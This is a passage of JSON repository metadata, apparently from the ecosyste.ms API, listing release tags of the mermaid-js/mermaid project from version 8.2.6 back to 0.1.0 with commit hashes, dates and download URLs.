8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14